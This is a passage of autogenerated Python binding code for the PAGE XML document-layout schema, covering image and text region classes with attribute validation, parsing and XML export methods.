outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ImageRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ImageRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ImageRegionType'):
super(ImageRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ImageRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.colourDepth is not None and 'colourDepth' not in already_processed:
already_processed.add('colourDepth')
outfile.write(' colourDepth=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.colourDepth), input_name='colourDepth')), ))
if self.bgColour is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
if self.embText is not None and 'embText' not in already_processed:
already_processed.add('embText')
outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ImageRegionType', fromsubclass_=False, pretty_print=True):
super(ImageRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('colourDepth', node)
if value is not None and 'colourDepth' not in already_processed:
already_processed.add('colourDepth')
self.colourDepth = value
self.validate_ColourDepthSimpleType(self.colourDepth) # validate type ColourDepthSimpleType
value = find_attr_value_('bgColour', node)
if value is not None and 'bgColour' not in already_processed:
already_processed.add('bgColour')
self.bgColour = value
self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
value = find_attr_value_('embText', node)
if value is not None and 'embText' not in already_processed:
already_processed.add('embText')
if value in ('true', '1'):
self.embText = True
elif value in ('false', '0'):
self.embText = False
else:
raise_parse_error(node, 'Bad boolean attribute')
super(ImageRegionType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
super(ImageRegionType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class ImageRegionType
class TextRegionType(RegionType):
"""Pure text is represented as a text region. This includes
drop capitals, but practically ornate text may be
considered as a graphic.
The angle the rectangle encapsulating the region
has to be rotated in clockwise direction
in order to correct the present skew
(negative values indicate anti-clockwise rotation).
(The rotated image can be further referenced
via “AlternativeImage”.)
Range: -179.999,180
The nature of the text in the region
The degree of space in points between the lines of
text (line spacing)
The direction in which text within lines
should be read (order of words and characters),
in addition to “textLineOrder”.
The order of text lines within the block,
in addition to “readingDirection”.
The angle the baseline of text within the region
has to be rotated (relative to the rectangle
encapsulating the region) in clockwise direction
in order to correct the present skew,
in addition to “orientation”
(negative values indicate anti-clockwise rotation).
Range: -179.999,180
Defines whether a region of text is indented or not
Text align
The primary language used in the region
The secondary language used in the region
The primary script used in the region
The secondary script used in the region"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('type_', 'pc:TextTypeSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('leading', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('readingDirection', 'pc:ReadingDirectionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('textLineOrder', 'pc:TextLineOrderSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('readingOrientation', 'float', 0, 1, {'use': 'optional'}),
MemberSpec_('indented', 'boolean', 0, 1, {'use': 'optional'}),
MemberSpec_('align', 'pc:AlignSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('primaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('secondaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('primaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('secondaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('production', 'pc:ProductionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('TextLine', 'TextLineType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextLine', 'type': 'TextLineType'}, None),
MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
]
subclass = None
superclass = RegionType
def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, type_=None, leading=None, readingDirection=None, textLineOrder=None, readingOrientation=None, indented=None, align=None, primaryLanguage=None, secondaryLanguage=None, primaryScript=None, secondaryScript=None, production=None, TextLine=None, TextEquiv=None, TextStyle=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
super(globals().get("TextRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
self.orientation = _cast(float, orientation)
self.orientation_nsprefix_ = None
self.type_ = _cast(None, type_)
self.type__nsprefix_ = None
self.leading = _cast(int, leading)
self.leading_nsprefix_ = None
self.readingDirection = _cast(None, readingDirection)
self.readingDirection_nsprefix_ = None
self.textLineOrder = _cast(None, textLineOrder)
self.textLineOrder_nsprefix_ = None
self.readingOrientation = _cast(float, readingOrientation)
self.readingOrientation_nsprefix_ = None
self.indented = _cast(bool, indented)
self.indented_nsprefix_ = None
self.align = _cast(None, align)
self.align_nsprefix_ = None
self.primaryLanguage = _cast(None, primaryLanguage)
self.primaryLanguage_nsprefix_ = None
self.secondaryLanguage = _cast(None, secondaryLanguage)
self.secondaryLanguage_nsprefix_ = None
self.primaryScript = _cast(None, primaryScript)
self.primaryScript_nsprefix_ = None
self.secondaryScript = _cast(None, secondaryScript)
self.secondaryScript_nsprefix_ = None
self.production = _cast(None, production)
self.production_nsprefix_ = None
if TextLine is None:
self.TextLine = []
else:
self.TextLine = TextLine
self.TextLine_nsprefix_ = "pc"
if TextEquiv is None:
self.TextEquiv = []
else:
self.TextEquiv = TextEquiv
self.TextEquiv_nsprefix_ = "pc"
self.TextStyle = TextStyle
self.TextStyle_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, TextRegionType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if TextRegionType.subclass:
return TextRegionType.subclass(*args_, **kwargs_)
else:
return TextRegionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_TextLine(self):
return self.TextLine
def set_TextLine(self, TextLine):
self.TextLine = TextLine
def add_TextLine(self, value):
self.TextLine.append(value)
def insert_TextLine_at(self, index, value):
self.TextLine.insert(index, value)
def replace_TextLine_at(self, index, value):
self.TextLine[index] = value
def get_TextEquiv(self):
return self.TextEquiv
def set_TextEquiv(self, TextEquiv):
self.TextEquiv = TextEquiv
def add_TextEquiv(self, value):
self.TextEquiv.append(value)
def insert_TextEquiv_at(self, index, value):
self.TextEquiv.insert(index, value)
def replace_TextEquiv_at(self, index, value):
self.TextEquiv[index] = value
def get_TextStyle(self):
return self.TextStyle
def set_TextStyle(self, TextStyle):
self.TextStyle = TextStyle
def get_orientation(self):
return self.orientation
def set_orientation(self, orientation):
self.orientation = orientation
def get_type(self):
return self.type_
def set_type(self, type_):
self.type_ = type_
def get_leading(self):
return self.leading
def set_leading(self, leading):
self.leading = leading
def get_readingDirection(self):
return self.readingDirection
def set_readingDirection(self, readingDirection):
self.readingDirection = readingDirection
def get_textLineOrder(self):
return self.textLineOrder
def set_textLineOrder(self, textLineOrder):
self.textLineOrder = textLineOrder
def get_readingOrientation(self):
return self.readingOrientation
def set_readingOrientation(self, readingOrientation):
self.readingOrientation = readingOrientation
def get_indented(self):
return self.indented
def set_indented(self, indented):
self.indented = indented
def get_align(self):
return self.align
def set_align(self, align):
self.align = align
def get_primaryLanguage(self):
return self.primaryLanguage
def set_primaryLanguage(self, primaryLanguage):
self.primaryLanguage = primaryLanguage
def get_secondaryLanguage(self):
return self.secondaryLanguage
def set_secondaryLanguage(self, secondaryLanguage):
self.secondaryLanguage = secondaryLanguage
def get_primaryScript(self):
return self.primaryScript
def set_primaryScript(self, primaryScript):
self.primaryScript = primaryScript
def get_secondaryScript(self):
return self.secondaryScript
def set_secondaryScript(self, secondaryScript):
self.secondaryScript = secondaryScript
def get_production(self):
return self.production
def set_production(self, production):
self.production = production
def validate_TextTypeSimpleType(self, value):
# Validate type pc:TextTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['paragraph', 'heading', 'caption', 'header', 'footer', 'page-number', 'drop-capital', 'credit', 'floating', 'signature-mark', 'catch-word', 'marginalia', 'footnote', 'footnote-continued', 'endnote', 'TOC-entry', 'list-label', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on TextTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ReadingDirectionSimpleType(self, value):
# Validate type pc:ReadingDirectionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left-to-right', 'right-to-left', 'top-to-bottom', 'bottom-to-top']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ReadingDirectionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_TextLineOrderSimpleType(self, value):
# Validate type pc:TextLineOrderSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['top-to-bottom', 'bottom-to-top', 'left-to-right', 'right-to-left']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on TextLineOrderSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_AlignSimpleType(self, value):
# Validate type pc:AlignSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left', 'centre', 'right', 'justify']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on AlignSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_LanguageSimpleType(self, value):
# Validate type pc:LanguageSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Abkhaz', 'Afar', 'Afrikaans', 'Akan', 'Albanian', 'Amharic', 'Arabic', 'Aragonese', 'Armenian', 'Assamese', 'Avaric', 'Avestan', 'Aymara', 'Azerbaijani', 'Bambara', 'Bashkir', 'Basque', 'Belarusian', 'Bengali', 'Bihari', 'Bislama', 'Bosnian', 'Breton', 'Bulgarian', 'Burmese', 'Cambodian', 'Cantonese', 'Catalan', 'Chamorro', 'Chechen', 'Chichewa', 'Chinese', 'Chuvash', 'Cornish', 'Corsican', 'Cree', 'Croatian', 'Czech', 'Danish', 'Divehi', 'Dutch', 'Dzongkha', 'English', 'Esperanto', 'Estonian', 'Ewe', 'Faroese', 'Fijian', 'Finnish', 'French', 'Fula', 'Gaelic', 'Galician', 'Ganda', 'Georgian', 'German', 'Greek', 'Guaraní', 'Gujarati', 'Haitian', 'Hausa', 'Hebrew', 'Herero', 'Hindi', 'Hiri Motu', 'Hungarian', 'Icelandic', 'Ido', 'Igbo', 'Indonesian', 'Interlingua', 'Interlingue', 'Inuktitut', 'Inupiaq', 'Irish', 'Italian', 'Japanese', 'Javanese', 'Kalaallisut', 'Kannada', 'Kanuri', 'Kashmiri', 'Kazakh', 'Khmer', 'Kikuyu', 'Kinyarwanda', 'Kirundi', 'Komi', 'Kongo', 'Korean', 'Kurdish', 'Kwanyama', 'Kyrgyz', 'Lao', 'Latin', 'Latvian', 'Limburgish', 'Lingala', 'Lithuanian', 'Luba-Katanga', 'Luxembourgish', 'Macedonian', 'Malagasy', 'Malay', 'Malayalam', 'Maltese', 'Manx', 'Māori', 'Marathi', 'Marshallese', 'Mongolian', 'Nauru', 'Navajo', 'Ndonga', 'Nepali', 'North Ndebele', 'Northern Sami', 'Norwegian', 'Norwegian Bokmål', 'Norwegian Nynorsk', 'Nuosu', 'Occitan', 'Ojibwe', 'Old Church Slavonic', 'Oriya', 'Oromo', 'Ossetian', 'Pāli', 'Panjabi', 'Pashto', 'Persian', 'Polish', 'Portuguese', 'Punjabi', 'Quechua', 'Romanian', 'Romansh', 'Russian', 'Samoan', 'Sango', 'Sanskrit', 'Sardinian', 'Serbian', 'Shona', 'Sindhi', 'Sinhala', 'Slovak', 'Slovene', 'Somali', 'South Ndebele', 'Southern Sotho', 'Spanish', 'Sundanese', 'Swahili', 'Swati', 'Swedish', 'Tagalog', 'Tahitian', 'Tajik', 'Tamil', 'Tatar', 'Telugu', 'Thai', 'Tibetan', 'Tigrinya', 'Tonga', 'Tsonga', 'Tswana', 'Turkish', 'Turkmen', 'Twi', 'Uighur', 'Ukrainian', 'Urdu', 'Uzbek', 'Venda', 'Vietnamese', 'Volapük', 'Walloon', 'Welsh', 'Western Frisian', 'Wolof', 'Xhosa', 'Yiddish', 'Yoruba', 'Zhuang', 'Zulu', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on LanguageSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ScriptSimpleType(self, value):
# Validate type pc:ScriptSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha (Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ProductionSimpleType(self, value):
# Validate type pc:ProductionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['printed', 'typewritten', 'handwritten-cursive', 'handwritten-printscript', 'medieval-manuscript', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ProductionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.TextLine or
self.TextEquiv or
self.TextStyle is not None or
super(TextRegionType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextRegionType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TextRegionType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'TextRegionType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextRegionType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TextRegionType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TextRegionType'):
super(TextRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextRegionType')
if self.orientation is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
if self.leading is not None and 'leading' not in already_processed:
already_processed.add('leading')
outfile.write(' leading="%s"' % self.gds_format_integer(self.leading, input_name='leading'))
if self.readingDirection is not None and 'readingDirection' not in already_processed:
already_processed.add('readingDirection')
outfile.write(' readingDirection=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.readingDirection), input_name='readingDirection')), ))
if self.textLineOrder is not None and 'textLineOrder' not in already_processed:
already_processed.add('textLineOrder')
outfile.write(' textLineOrder=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.textLineOrder), input_name='textLineOrder')), ))
if self.readingOrientation is not None and 'readingOrientation' not in already_processed:
already_processed.add('readingOrientation')
outfile.write(' readingOrientation="%s"' % self.gds_format_float(self.readingOrientation, input_name='readingOrientation'))
if self.indented is not None and 'indented' not in already_processed:
already_processed.add('indented')
outfile.write(' indented="%s"' % self.gds_format_boolean(self.indented, input_name='indented'))
if self.align is not None and 'align' not in already_processed:
already_processed.add('align')
outfile.write(' align=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.align), input_name='align')), ))
if self.primaryLanguage is not None and 'primaryLanguage' not in already_processed:
already_processed.add('primaryLanguage')
outfile.write(' primaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryLanguage), input_name='primaryLanguage')), ))
if self.secondaryLanguage is not None and 'secondaryLanguage' not in already_processed:
already_processed.add('secondaryLanguage')
outfile.write(' secondaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryLanguage), input_name='secondaryLanguage')), ))
if self.primaryScript is not None and 'primaryScript' not in already_processed:
already_processed.add('primaryScript')
outfile.write(' primaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryScript), input_name='primaryScript')), ))
if self.secondaryScript is not None and 'secondaryScript' not in already_processed:
already_processed.add('secondaryScript')
outfile.write(' secondaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryScript), input_name='secondaryScript')), ))
if self.production is not None and 'production' not in already_processed:
already_processed.add('production')
outfile.write(' production=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.production), input_name='production')), ))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextRegionType', fromsubclass_=False, pretty_print=True):
super(TextRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for TextLine_ in self.TextLine:
namespaceprefix_ = self.TextLine_nsprefix_ + ':' if (UseCapturedNS_ and self.TextLine_nsprefix_) else ''
TextLine_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextLine', pretty_print=pretty_print)
for TextEquiv_ in self.TextEquiv:
namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
if self.TextStyle is not None:
namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('orientation', node)
if value is not None and 'orientation' not in already_processed:
already_processed.add('orientation')
value = self.gds_parse_float(value, node, 'orientation')
self.orientation = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
self.validate_TextTypeSimpleType(self.type_) # validate type TextTypeSimpleType
value = find_attr_value_('leading', node)
if value is not None and 'leading' not in already_processed:
already_processed.add('leading')
self.leading = self.gds_parse_integer(value, node, 'leading')
value = find_attr_value_('readingDirection', node)
if value is not None and 'readingDirection' not in already_processed:
already_processed.add('readingDirection')
self.readingDirection = value
self.validate_ReadingDirectionSimpleType(self.readingDirection) # validate type ReadingDirectionSimpleType
value = find_attr_value_('textLineOrder', node)
if value is not None and 'textLineOrder' not in already_processed:
already_processed.add('textLineOrder')
self.textLineOrder = value
self.validate_TextLineOrderSimpleType(self.textLineOrder) # validate type TextLineOrderSimpleType
value = find_attr_value_('readingOrientation', node)
